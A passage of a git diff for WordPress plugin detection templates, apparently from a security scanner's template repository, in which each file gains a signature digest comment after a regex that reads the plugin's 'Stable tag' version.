b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203bb3212d141ba30030ce1db2e5f14c9df8d6cefbfb272286b9627dd24bc40f2c02202b879bb77aa48a85f29ef64648e44ffb37f466b4337bf5f34bd921504d1c32f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..70968c68f7 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220612dd1f6fa61039d99418cbca94e4fcf0c591fd5319ecb2c0c2080b6f0113c7402204b53e18be6a9a1ace7db909eeb9b9bd90d68ff17378ec95d1aeedc434a70601d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..2ec1940f21 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b4cec05978e3fd5729b58538fd75c837de7f708ebdaf761f3e4c4808786251ab0221009a3e78c2987a2b5c468ea78f70bfbb00cdfca6c2050c3ded7e4775e2f180b942:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..59dbc529d1 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c46fbf997f12c4f942cce6be5c7de7226baf2fd5bb712cb0cec7b46ff79b901702206ec420a9a26e47047f11d941a8ce66063ec58bb709e5d89d379d9f8079bb20f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..9b8e4b7558 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220028c5013df54a65100d03f227c54e9a3b4bad3b5df8b08ce5ee6bbcdfc69afaa022100ff948dbc051e2f79b1572eeff59e5b10fafd82649ae443fb09a3993d0749fb07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..e9ec2c1adc 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009450bce55e1341db15fa228d47f8d391c588f9b737332f06a918056e90e5b2cc02207037ba3cf0f9cb08c5d58caef80202cd2593fc42ac0eee5a2e911c30b89f3e08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..54fe67d95b 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022016be700c3d0af850a6b3ed5f56909ff586b88f102c15b796cc24c42414cb53eb02201d7497bba13588cbcc7b570ba5ef35fd561dbdc41dc149c3ca61d67e3dab4f44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..ada94181a3 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022042a1f364b74f217ef256400da3522f9e5976370ce2a6b8b94c2bab901ce39afd022100dd80459b10d2574f660a626fac51c618012e3585f0018f21f29511168663f629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..7850599dc2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b61989bd78d0161c107173b8cee82a1f39b05fe295710bc2016a49bd8cf0a9be022020be60d6395bfd51d92409783220fa375cff26b6950538b9ef43cca4436035ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..7131275310 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220212b4ed435cdd981d9cd58d0e6785fe914e400d61e9be356e0dd5d2af471c36e022100d9200835e2168db83bc19021698c4825114a16e81674a87b84dff3794f52bd99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..a3e0786d75 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203fab07aeb4943adcc44d54bd5ae39dbd36fbc9cc23025bb1dd39e9a91119aa6702200c26e02d35419ce25165659c2befe5e9a9cf1a9bc4f4fc8ed960f104464f01c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..504e96476d 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ddc33475331801c3c98cb596093a1fd1c8c0b59f8b8563ef97afa999d20b4861022100c3fb4fb6e0966780ca77d9e7d0f5f02e856a88de8ba1a1211b0075509b69b275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..b2f593bb9a 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207c5539f386411d6917ed24a60539bc28d52e1fc28426c2f0641d4d8f5e638047022018377b71d0c894c1537a0b3b8299fd38925982bc066065f82dd057f1e1895d98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..729ccb0a05 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a06b29b2a1811b8bf677899d2a11db76e18dfa7cda30cbdd2750fba45353e45b022100fd510381cffdbda2477c7198413b88537482027c19306c230e7093349ad9f100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..8f0210d573 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207617051609ac9c6905260aba997c8492d2bdd3ef4ed856659e72b94337d14216022100effd7cb7ba5e707c9df6059ea0d83ba227883458a530ad44ea81807c21734f8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..4aee1be968 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079ac90a2c532fedbda0fe21d746216370d5eb1d56ff0b578a8cf8964100047e102200fceb1bf09ab495b1306526489f9d75bfceec3ad3bffe56ef55f43c9e46c14ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..ca31474fae 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204fbe736926167629944cef404ed890029b5b92224aa0a52aa8518b6353ba4db702206668d951c3f81499ffbad63936a2112e09b7ab8d5ab2391b7dd9c4a992b74c9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..232e79bad7 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220561a8f828d00ea0f538c1df5fa5020a36274e87b23ee2e63b87be6d3d102cd99022100c0677d793bd3bbdd6a6e416f00a9ad5d04fcce054871a806137badc731fa7a52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..c9b3d0d949 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c8e998321f5b2fbe1f17e641eca01732c11301da60e7f4d7632f0f7dc862a328022100f072dfaa96a7376ed86a2828c0add068418308969aea442739742f89fbc42aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..78b7a2c622 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022062b932cebe08ca85fb150767855fe8373be2770d033fac7518619423430c1432022100e0b90551ee3ed888f2dc6620fce7d02339ceb141df757f11d230ceb49d2c47fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..b793c0068f 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201a05e874d37fa78054619ea667f7a9b8242a7819b8586e491995bb4e2089090f02210093dc84e41402a888cee947a04bd4acf8805e936c02d56d9af9103a284a7f0d37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..33ea1daede 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c5f1741a4876580447ee38d9e1d0e797f00c51c8c56fbeee08f27826686fcdb2022100f8b181b2f46f77dcb799d560b81eed4b69c9e434beff3c7c45589265d372c140:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..3c1240ae92 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206b923a678ba509b146daa215ea0692e19763f52e5b5de9c282285de3f1159a2c0221009492b93013f7440f2b1c21b276cb5756d30234a65e8a12746e83003ffcf6be93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..04f9d72753 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220167944c89f5042e52c32592499ee8a990b5a84a202136d602a270f0cd8c308470221009c83dac5e3e30e502932bca4dad340a83ac0fb57b832899240f87f8230311045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..e75672d9b3 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d94a5f2c61c3f2422c6fa91fdddfaa962ae3e202e38c2faac0ff3583c715228702210098ab54e54f4bf9eb6a0eb9065d3bbc9a007cf9bf1c383fa5c718593d43a456da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..6be7fca03a 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022064ad379085043f771058e40b5aad28c83fcb29daea9dc5ef98411a6c93b27bac02206b9497849533d97eae9cda441bd605c76152341ecb5c9417ebb9026a059ec03a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..f60335c7dd 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022021e9c828c3d7088e6037488c4b2e192deb8ad5367286fe63ee6e1730aef9d72a022100b960a1ff71c6a7d579864bf66f4eb7961a51153f3f3a74230e267d603351f556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..46d1dcb29b 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201ccc3a2a266b288d137e66ca99dd658c91d36b0e6aa7a8a20b0abf151be823db0221008e2155ef1bb771b35f081e215142b4e8d3053ad0a77e60143f5a07865476f513:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..8bf2745688 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200a8d1ac416060275d8bf829af9652259430b7263c182b49c8e4a0c27017124d802210089908ddeaa6411ba5630c3ca04ff1333d40bc27c0d0fbfe6baa158b8b661f7cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..7246429067 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009223d1c8ebf897d86a1ff57bbea64186c2b841d8912af5e89dce4761ede4c3fe022100d5e9260d3badacc450234ef3f32d267887af7d5353881135203e50585d05fa6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..9945c51e95 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022025823ba771df7acb4b74139b6adeaec2794d71e28b1eab72849a3db862ee4d720220613ddc327303ba3421a170d568420262abb7eef25bd6e5bc9e55bdb7bef4203c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..c6777c9ead 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fa0acd282bb4884d7c1ce1fbbfe61fbd1b1466d924d2d7fa2de9c4226f8cdb08022100db3f53cd420f8e5615f56505ca4bc2505fa9a498cad49dd3f36ab51efee9a3f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..0fdf5396dc 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204d25bd757b8efded4e6332ac884fada07d9d997a3aa46e63648755fb63235b4b022100ec1be1e929ab7efae359d8baea63db04cfd6913458e8d6690f96d29a6a5a61ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..9ecab359ee 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dafeb53912de1244779f4b517a549216d1eaceaaa246ce660d380aa9ab810d1f022100de23f333e5c4c162a5b4355835315fea8e0c6b1f7caea6ca10c3f8c5e5175bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..013f2060b7 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203cef452d9334928a2720f2b9cb700eaf037a7f5d8f2633935600962e4cd10f4c0220479ced53afa4d19e0de5f820fd84a2419babe0dc07caa90b38299e6384f23619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..957777bd33 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a549a2f9c95a91b0a80ca76f7b656b08a08c74c97fddf7781bc7274a27923afd022100916ed6f1ebd91a8f271f8d7257929cd0705d7e55c6383dbad35e26f7eab42768:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..b2bb724fb6 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200bf9a7a5ae4e128b090f3d3880ad8f263674603084b4e228f1a3914023de93a2022100ee97a8db80937e6f0f4ebc0ddebac2dad59b6429008654e051952e1ebdf60acc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..231e1fa66f 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202317629388847e2579088eab973a0413c6bc3c22d47e7c7a2bd45a30434a9a78022100bc63eede7c3b20bb9c0c6eac2f54ead993f1c7026f0f56e607bf4d6837e7341b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..6f06f2be5b 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220237dbf596c2f2a9baadb30c8b5e8c2b962a9d08c74ab41e3b0370849a2572ec9022046715951a8bde589428116b8521d6fbafd7cfda2d3f99f1ca05bceb24415ecf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..45a0515e3b 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009c5b81779c7ee5d067402ad4e7b508cc5da73e2cad84fbb865999f82cbcbc7eb022100b8bbf881ab7c35d1d3ef320f3b8e4df95c0a2eabf42e8ffd68f64cdae006ffc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..03260055b1 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e7914ee840a192eacb0d57b1ffb60d8275afc1e5bbde486a8b3115e996e8ce6c022031538ceffdf71696a3e30b12a16c529abf70d9baa89df1599e14e75f194c7c14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..e066a30a40 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b521961166080fae8765e878db91e6882609ff7ed872a083466325aae85ebba802206bf0c7e74b38a7832196bf855f4dd8b79a61b523d5b18d56aa467cb9ed1f0bdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..23b6e514fc 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204665c206d655bc19b2153d9b4b8e39df32926b85261f9a36697ead43bd0c80eb0220724bdf532c2dff16f75c25799861cc281fd23a86920af8208e07cd4637d3b576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..4aa1e6b200 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202c3a43603e41eab613dbbd5d8435f67b935a9efee2c317088aca47b5ec297381022100cae7311d0b97a70fab53b0d26edea97a49ab7f4cbca3423d80751755b3499bac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..b3a7591513 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009a383cd416aa90204949b7d2a43254fc4793c64b5554a99ef95b1d0f803deec9022100d3597c69437753d87dc0b316bf028f9fbfef58dfbe48fae5f589c32aeae28cf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..d651f7012c 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cf111c5923d97b0204e6c0b71d8f987cd6c5b29280ae195313f9e3f9569a6cde02206bd9b8ad373761754f3ae9a847f950af969e088477c1696f7695c63bd78c3287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..6e6b727c0e 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204b118685072115a827b948f9b33cf4f931c8ca663447429039a2d2fd4efc2941022100f607c3f8c9eb12c742897733c9924880e6a4ad6d054ceda5414eaf9f2262f09b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..0f57e9a361 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009deb37871825b0c7f4bc94f1cc7c43ea910962a867e9a691e181df4468ea490002205c1919a080fb490a35c5d55afebc875f7155666cd1a7e2e7f0ace5e6e366fe20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 